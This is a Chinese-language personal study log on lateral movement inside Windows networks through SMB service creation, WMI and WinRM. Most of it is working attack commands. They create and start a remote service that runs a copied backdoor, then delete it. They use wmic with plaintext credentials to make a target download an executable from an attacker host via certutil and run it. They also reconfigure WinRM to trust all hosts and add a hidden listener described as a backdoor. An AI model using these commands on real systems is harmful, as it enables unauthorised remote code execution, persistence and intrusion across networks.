记录内网渗透学习进程--DAY18

IPC+sc 进行横向移动--445端口

当你通过各种手段(dump密码，hash，3389凭证，各类终端，键盘记录，密码本)获取密码之后，想横向移动时候，发现Task Scheduler服务没有启用

这个时候你可以远程建立服务，并启动服务来运行我们想运行的命令

①获取凭证后先make_token或者pth,成功ls到对方服务器

②将后门copy到对方机器上

③sc \\10.10.10.2 create test binpath= "cmd.exe /c c:\8092.exe"   #创建一个服务，路径指向后门

 

 

 

④sc \\10.10.10.2 start test    #启动服务，并成功上线

 

 

 

 

 

⑤shell sc \\10.10.10.2 delete test   #删除服务

 

⑥删除后门

 

 

135端口横向移动---135端口的横向移动

当扫描C段时扫描到135端口，没有开放445端口，此时就可以使用WMI来进行横向渗透

WMI（系统插件）

wmi就是WMI的管理工具

①相同的，先得到凭证然后使用

②powershell上线方法

shell wmic /NODE:10.10.10.2 /user:"administrator" /password:"admin" PROCESS call create "certutil -urlcache -split -f http://10.10.10.1/10000.exe c:\windows\temp\10000.exe"

③certutil上线方法

shell wmic /NODE:10.10.10.3 /user:"administrator" /password:"admin" PROCESS call create "certutil -urlcache -split -f http://10.10.10.1/10000.exe c:\windows\temp\10000.exe"   #先下载
shell wmic /NODE:10.10.10.3 /user:"administrator" /password:"admin" PROCESS call create "cmd.exe /c c:\windows\temp\10000.exe"  #再运行

④如果本机有445，可以把文件放在共享文件夹内，然后再net use 复制过去

 

 

WinRM（Windows Remote Management)--5985端口  是Windows对WS-Management的实现，WinRM允许远程用户使用工具和脚本对Windows服务器进行管理并获取数据。


Web服务管理协议（WS-Management，Web Services-Management）是一种基于SOAP协议的DMTF开放标准，用于对服务器等网络设备以及各种Web应用程序进行管理。

一.利用的条件

1. 通信的双方都需要开启WinRM服务

Windows 2008 以上版本默认自动状态，Windows Vista/win7上必须手动启动；WinRS 适用于Windows 2008 以上版本；Windows 2012 之后的版本默认允许远程任意主机来管理。开启可以使用下面其中一条命令即可

winrm qc
winrm quickconfig -q

2. 服务端防火墙允许WinRM服务端口通信

默认为5985、5986；如果5985打开，但是5986关闭，标识WinRM服务配置为仅接受HTTP连接。修改默认端口可以使用如下：

winrm set winrm/config/Listener?Address=*+Transport=HTTP @{Port="80"}

 

3. WinRM通信两端配置要求

要确保发起连接的主机与目标主机处于同一域或者两台主机的WinRM服务TrustedHosts中必须存在对方主机的IP或主机名
winrm set winrm/config/Client @{TrustedHosts="*"}

 

 

查看信任主机

winrm get winrm/config/client|findstr TrustedHosts

 

4.WinRS 进行远程管理

winrs -r:http://192.168.2.10:5985 -u:administrator -p:admin ipconfig

 

 

 

 win 7 - win10可以使用，任何用户都可以使用，无需添加注册表

不能是公共网络，相互为信任主机(同一域下即可，就不用添加信任)

 

对于Windows Server 2012以上的服务器操作系统中，WinRM服务默认启动并监听了5985端口。通过下面的命令，可以新增WinRM一个80端口的监听(相当于一个后门):
winrm set winrm/config/service @{EnableCompatibilityHttpListener="true"}
PS：该方法适用于有web的机器，不会开启新端口，也不需要新的EXE进程或DLL劫持。